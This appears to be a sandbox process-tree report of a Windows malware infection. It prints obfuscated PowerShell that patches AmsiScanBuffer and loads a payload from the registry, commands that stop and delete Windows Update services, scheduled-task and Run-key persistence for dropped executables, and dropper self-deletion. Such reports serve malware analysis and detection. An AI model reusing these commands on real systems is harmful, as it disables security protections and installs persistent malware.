PID 5084 wrote to memory of 2128	5084	cmd.exe	powercfg.exe
PID 4464 wrote to memory of 2972	4464	cmd.exe	sc.exe
PID 4464 wrote to memory of 2972	4464	cmd.exe	sc.exe
PID 5084 wrote to memory of 3144	5084	cmd.exe	powercfg.exe
PID 5084 wrote to memory of 3144	5084	cmd.exe	powercfg.exe
PID 4464 wrote to memory of 1320	4464	cmd.exe	sc.exe
PID 4464 wrote to memory of 1320	4464	cmd.exe	sc.exe
PID 4464 wrote to memory of 1624	4464	cmd.exe	sc.exe
PID 4464 wrote to memory of 1624	4464	cmd.exe	sc.exe
PID 4464 wrote to memory of 1408	4464	cmd.exe	reg.exe
PID 4464 wrote to memory of 1408	4464	cmd.exe	reg.exe
PID 4464 wrote to memory of 3336	4464	cmd.exe	reg.exe
PID 4464 wrote to memory of 3336	4464	cmd.exe	reg.exe
PID 4464 wrote to memory of 3756	4464	cmd.exe	reg.exe
PID 4464 wrote to memory of 3756	4464	cmd.exe	reg.exe
PID 4464 wrote to memory of 568	4464	cmd.exe	reg.exe
PID 4464 wrote to memory of 568	4464	cmd.exe	reg.exe
PID 4464 wrote to memory of 940	4464	cmd.exe	reg.exe
PID 4464 wrote to memory of 940	4464	cmd.exe	reg.exe
PID 3532 wrote to memory of 2624	3532	72EE.exe	dialer.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:676

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:604

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:336

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{61a099f8-1da4-45b6-bba7-b6807be6ba4d}
2⤵
PID:1128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:516

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1152

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:2508

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:FLksSsppGxfj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$DzkNqifhhvDqzH,[Parameter(Position=1)][Type]$OBmUyURpkX)$fBIawKmhEqU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+''+[Char](108)+''+'e'+''+'c'+''+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+'e'+'l'+'e'+[Char](103)+'at'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'nMe'+[Char](109)+''+'o'+''+'r'+''+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+[Char](121)+''+[Char](112)+'e','Cl'+[Char](97)+''+[Char](115)+'s,P'+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+''+'l'+'e'+[Char](100)+''+[Char](44)+'An'+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+',A'+'u'+'t'+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$fBIawKmhEqU.DefineConstructor('R'+'T'+''+[Char](83)+''+'p'+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+'Si'+[Char](103)+''+[Char](44)+'P'+[Char](117)+'bl'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$DzkNqifhhvDqzH).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+'n'+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');$fBIawKmhEqU.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+'y'+'S'+''+'i'+''+'g'+''+','+''+[Char](78)+''+[Char](101)+'wS'+[Char](108)+'ot,'+[Char](86)+'ir'+'t'+'ua'+[Char](108)+'',$OBmUyURpkX,$DzkNqifhhvDqzH).SetImplementationFlags(''+'R'+''+'u'+'nt'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $fBIawKmhEqU.CreateType();}$xtQosOtAEpysw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'yst'+[Char](101)+'m'+[Char](46)+'d'+'l'+''+[Char](108)+'')}).GetType(''+'M'+''+'i'+''+[Char](99)+'ro'+'s'+''+[Char](111)+''+[Char](102)+''+'t'+''+'.'+''+[Char](87)+''+[Char](105)+''+'n'+'3'+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+'x'+''+'t'+''+'Q'+''+'o'+''+'s'+''+'O'+'t'+[Char](65)+''+[Char](69)+'p'+[Char](121)+''+'s'+''+[Char](119)+'');$GzWfiVVDuHlgTD=$xtQosOtAEpysw.GetMethod(''+[Char](71)+''+'z'+'W'+[Char](102)+'i'+'V'+''+[Char](86)+''+[Char](68)+''+[Char](117)+''+'H'+''+[Char](108)+''+'g'+'TD',[Reflection.BindingFlags]''+'P'+'u'+'b'+'l'+[Char](105)+''+[Char](99)+','+'S'+''+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$UtVXeVqQcEyasrVgRWS=FLksSsppGxfj @([String])([IntPtr]);$eOkRjptRYUAHVVWxKNuBic=FLksSsppGxfj @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$GHKbavbTUlr=$xtQosOtAEpysw.GetMethod('G'+'e'+''+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+''+'u'+'l'+'e'+'H'+[Char](97)+''+'n'+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+''+'n'+''+[Char](101)+'l'+[Char](51)+'2'+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$xGgnRVMiXgrgde=$GzWfiVVDuHlgTD.Invoke($Null,@([Object]$GHKbavbTUlr,[Object](''+[Char](76)+'oa'+[Char](100)+'L'+[Char](105)+'br'+[Char](97)+''+[Char](114)+'y'+[Char](65)+'')));$jpsaHiQVLSdoqSAEA=$GzWfiVVDuHlgTD.Invoke($Null,@([Object]$GHKbavbTUlr,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+[Char](97)+'lP'+'r'+'ot'+'e'+''+[Char](99)+''+[Char](116)+'')));$ghMzHfM=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xGgnRVMiXgrgde,$UtVXeVqQcEyasrVgRWS).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'');$DGaGsquLaPXrytYBE=$GzWfiVVDuHlgTD.Invoke($Null,@([Object]$ghMzHfM,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+'n'+'B'+''+[Char](117)+'ff'+[Char](101)+'r')));$zGTqtznBSY=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jpsaHiQVLSdoqSAEA,$eOkRjptRYUAHVVWxKNuBic).Invoke($DGaGsquLaPXrytYBE,[uint32]8,4,[ref]$zGTqtznBSY);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$DGaGsquLaPXrytYBE,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jpsaHiQVLSdoqSAEA,$eOkRjptRYUAHVVWxKNuBic).Invoke($DGaGsquLaPXrytYBE,[uint32]8,0x20,[ref]$zGTqtznBSY);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+'F'+[Char](84)+'W'+[Char](65)+'RE').GetValue(''+'d'+'i'+[Char](97)+''+[Char](108)+'e'+[Char](114)+''+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2096

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:264

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:pMNQtbLzGVle{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$YuPdhmrSmYaBqy,[Parameter(Position=1)][Type]$FqsKlOwphz)$WTFqozTAgrj=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+'l'+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+''+[Char](101)+''+'m'+''+'o'+''+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+'d'+'u'+''+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+'yDel'+'e'+''+'g'+''+[Char](97)+'t'+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+'a'+'s'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](83)+''+'e'+''+'a'+''+'l'+'e'+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+'s'+','+'A'+'u'+''+[Char](116)+''+[Char](111)+'C'+[Char](108)+''+[Char](97)+'ss',[MulticastDelegate]);$WTFqozTAgrj.DefineConstructor('RT'+[Char](83)+''+[Char](112)+'e'+[Char](99)+'i'+[Char](97)+'l'+'N'+'a'+'m'+'e,H'+[Char](105)+'d'+[Char](101)+''+'B'+''+[Char](121)+'S'+'i'+''+[Char](103)+','+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$YuPdhmrSmYaBqy).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$WTFqozTAgrj.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'','P'+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+','+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+'l'+''+[Char](111)+'t'+[Char](44)+'Vi'+[Char](114)+'t'+'u'+'a'+[Char](108)+'',$FqsKlOwphz,$YuPdhmrSmYaBqy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+'t'+''+'i'+''+[Char](109)+'e'+','+''+'M'+''+'a'+''+[Char](110)+''+[Char](97)+'ge'+[Char](100)+'');Write-Output $WTFqozTAgrj.CreateType();}$cQMtRZLfZZOTA=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+'c'+'r'+'o'+[Char](115)+''+'o'+'f'+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+''+'n'+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+'n'+[Char](115)+'a'+[Char](102)+'ec'+'Q'+''+'M'+'t'+[Char](82)+''+[Char](90)+''+[Char](76)+''+'f'+'ZZOT'+'A'+'');$vHuiMcZeVEHSzc=$cQMtRZLfZZOTA.GetMethod(''+[Char](118)+''+[Char](72)+''+'u'+''+[Char](105)+''+[Char](77)+''+'c'+''+[Char](90)+''+'e'+'V'+[Char](69)+''+'H'+''+'S'+''+'z'+''+'c'+'',[Reflection.BindingFlags]'P'+[Char](117)+'bl'+[Char](105)+''+'c'+','+[Char](83)+''+'t'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$vinSCfyTOSsrfQcywWu=pMNQtbLzGVle @([String])([IntPtr]);$TSNkltwNahnsdSuJqnziAp=pMNQtbLzGVle @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$rguzWvthHDc=$cQMtRZLfZZOTA.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'M'+''+'o'+''+[Char](100)+''+'u'+'l'+[Char](101)+'Ha'+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+'e'+''+[Char](114)+''+[Char](110)+'e'+[Char](108)+'3'+[Char](50)+''+[Char](46)+'dl'+[Char](108)+'')));$rirrqfdFVBhgIL=$vHuiMcZeVEHSzc.Invoke($Null,@([Object]$rguzWvthHDc,[Object](''+'L'+''+[Char](111)+''+'a'+'d'+'L'+'ib'+[Char](114)+''+[Char](97)+'ry'+[Char](65)+'')));$ZBwonrAoFVcVjMYcJ=$vHuiMcZeVEHSzc.Invoke($Null,@([Object]$rguzWvthHDc,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+'e'+'c'+''+[Char](116)+'')));$EaeXaXY=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rirrqfdFVBhgIL,$vinSCfyTOSsrfQcywWu).Invoke(''+'a'+''+[Char](109)+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+'l'+'');$alGYqQbuhtSkgJQxk=$vHuiMcZeVEHSzc.Invoke($Null,@([Object]$EaeXaXY,[Object](''+'A'+'ms'+[Char](105)+'Sca'+'n'+''+[Char](66)+'u'+[Char](102)+''+'f'+'er')));$MSrqrTTMvi=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZBwonrAoFVcVjMYcJ,$TSNkltwNahnsdSuJqnziAp).Invoke($alGYqQbuhtSkgJQxk,[uint32]8,4,[ref]$MSrqrTTMvi);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$alGYqQbuhtSkgJQxk,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZBwonrAoFVcVjMYcJ,$TSNkltwNahnsdSuJqnziAp).Invoke($alGYqQbuhtSkgJQxk,[uint32]8,0x20,[ref]$MSrqrTTMvi);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+'R'+'E'+'').GetValue('d'+[Char](105)+''+[Char](97)+''+[Char](108)+''+'e'+'r'+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:3176

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1944

C:\Users\Admin\AppData\Roaming\WindowsMIT\nvdrivesllapi.exe
C:\Users\Admin\AppData\Roaming\WindowsMIT\nvdrivesllapi.exe
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:788

C:\Users\Admin\AppData\Roaming\gkIWDAuNSZ\svcupdater.exe
C:\Users\Admin\AppData\Roaming\gkIWDAuNSZ\svcupdater.exe
2⤵
- Executes dropped EXE
PID:5088

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1236

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1060

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1044

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1608

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1552

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1460

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1664

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1384

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:2360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1368

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
1⤵
PID:1692

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1792

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1832

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1892

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1912

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1952

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2016

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1444

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2120

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2132

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2456

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:2560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2628

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2708

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1996

C:\Users\Admin\AppData\Local\Temp\fa0f4e959fa71afb411b0e389bd9b6401407c7074a8fd049d557cba683f7a856.exe
"C:\Users\Admin\AppData\Local\Temp\fa0f4e959fa71afb411b0e389bd9b6401407c7074a8fd049d557cba683f7a856.exe"
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:5016

C:\Users\Admin\AppData\Local\Temp\72EE.exe
C:\Users\Admin\AppData\Local\Temp\72EE.exe
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3532

C:\Users\Admin\AppData\Local\Temp\73F8.exe
C:\Users\Admin\AppData\Local\Temp\73F8.exe
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4680

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C schtasks /create /tn \gkIWDAuNSZ /tr "C:\Users\Admin\AppData\Roaming\gkIWDAuNSZ\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
3⤵
- Suspicious use of WriteProcessMemory
PID:1192

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \gkIWDAuNSZ /tr "C:\Users\Admin\AppData\Roaming\gkIWDAuNSZ\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
4⤵
- Creates scheduled task(s)
PID:3612

C:\Users\Admin\AppData\Local\Temp\8416.exe
C:\Users\Admin\AppData\Local\Temp\8416.exe
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:716

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:1160

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:1124

C:\Windows\explorer.exe
C:\Windows\explorer.exe
2⤵
PID:1980

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:1328

C:\Windows\explorer.exe
C:\Windows\explorer.exe
2⤵
PID:3652

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:3648

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:4464

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:4300

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:3164

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:2972

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1320

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1624

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:1408

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:3336

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:940

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:568

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:3756

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vngabyebz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'nvdrivesllapi' /tr '''C:\Users\Admin\AppData\Roaming\WindowsMIT\nvdrivesllapi.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\WindowsMIT\nvdrivesllapi.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'nvdrivesllapi' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "nvdrivesllapi" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\WindowsMIT\nvdrivesllapi.exe' }
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5000

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:5084

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3444

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2772

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2128

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3144

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
PID:2624

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\72EE.exe"
2⤵
PID:2396

C:\Windows\System32\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:5004

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qisygekiu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "nvdrivesllapi" } Else { "C:\Users\Admin\AppData\Roaming\WindowsMIT\nvdrivesllapi.exe" }
2⤵
PID:4532

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn nvdrivesllapi
3⤵
PID:2344

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
